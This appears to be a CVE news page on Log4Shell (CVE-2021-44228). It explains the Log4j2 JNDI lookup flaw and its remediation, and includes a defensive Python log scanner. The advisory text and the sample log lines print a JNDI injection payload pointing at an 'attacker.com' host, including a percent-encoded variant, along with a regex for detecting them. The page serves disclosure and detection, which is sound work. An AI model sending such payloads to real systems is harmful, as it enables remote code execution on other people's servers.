>_ 0dayNews
CVE Record
[ CRITICAL ] CVE-2021-44228

Log4Shell — Apache Log4j2 Remote Code Execution

A critical remote-code-execution vulnerability in Apache Log4j2, the ubiquitous Java logging library, allows an unauthenticated attacker to execute arbitrary code through JNDI lookup injection, simply by getting a string they control logged. It is one of the most widely exploited vulnerabilities in internet history, owing to Log4j's near-universal presence in Java applications.

cat cve-2021-44228.json
Vendor: Apache
Product: Log4j2
CVSS: 10.0
Status: kev
Published

CVE-2021-44228 — “Log4Shell” — is a maximum-severity (CVSS 10.0) remote-code-execution vulnerability in Apache Log4j2, disclosed on December 10, 2021. Log4j2’s message-lookup substitution feature would resolve JNDI (Java Naming and Directory Interface) strings embedded in logged input, including strings an attacker fully controlled — a chat message, a User-Agent header, a username field. A malicious ${jndi:ldap://attacker.com/a} string, once logged, could cause the target application to fetch and execute attacker-controlled Java code.
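Because the trigger is simply a logged string, a defender can search existing logs for the lookup pattern described above. The following is an added example, not code from this page or from Apache: it scans web access-log lines for JNDI lookup strings, including percent-encoded ones. The log lines are constructed samples in combined access-log format, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Matches the start of a Log4j2 JNDI lookup and captures scheme and host,
# e.g. ${jndi:ldap://host/path}. The match is case-insensitive.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s:]+)", re.IGNORECASE)

# Constructed access-log lines (combined format); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.com/a}"',
    '198.51.100.4 - - [10/Dec/2021:14:02:15 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:03:40 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.com%2Fa%7D HTTP/1.1" 200 87 "-" "curl/7.79.1"',
    '192.0.2.55 - - [10/Dec/2021:14:05:02 +0000] "GET /docs/jndi-overview HTTP/1.1" 200 2210 "-" "Mozilla/5.0"',
]

def decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly (bounded) so encoded lookups become visible."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def find_jndi_lookups(lines):
    """Return one finding per log line that contains a JNDI lookup string."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_RE.search(decode_fully(line))
        if match:
            findings.append({
                "line": number,
                "client": line.split(" ", 1)[0],       # first field: client address
                "scheme": match.group(1).lower(),       # e.g. ldap
                "callback_host": match.group(2),        # host the lookup points at
                "encoded": JNDI_RE.search(line) is None,  # only visible after decoding
            })
    return findings

if __name__ == "__main__":
    for finding in find_jndi_lookups(SAMPLE_LOG):
        print(finding)
```

A hit shows only that the string was received and logged; whether the application was exposed depends on the Log4j2 version that processed it.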

Why it mattered

Log4j2 is embedded, directly or transitively, in an enormous share of Java software — enterprise applications, cloud platforms, games (Minecraft’s exploitation was one of the first public demonstrations), and countless internal tools most organizations didn’t even know depended on it. The combination of trivial exploitation, no authentication requirement, and near-universal deployment made this one of the broadest single-vulnerability exploitation events ever recorded, with mass internet scanning for vulnerable endpoints beginning within hours of disclosure.

CISA and international CERT agencies issued emergency directives; the vulnerability was added to the KEV catalog immediately. The Apache Logging Services team shipped Log4j 2.15.0 as an initial fix, followed rapidly by 2.16.0 and 2.17.x after further related issues (CVE-2021-45046, CVE-2021-45105) were found in the original patch. Full remediation guidance is at Apache’s security page and the NVD link above.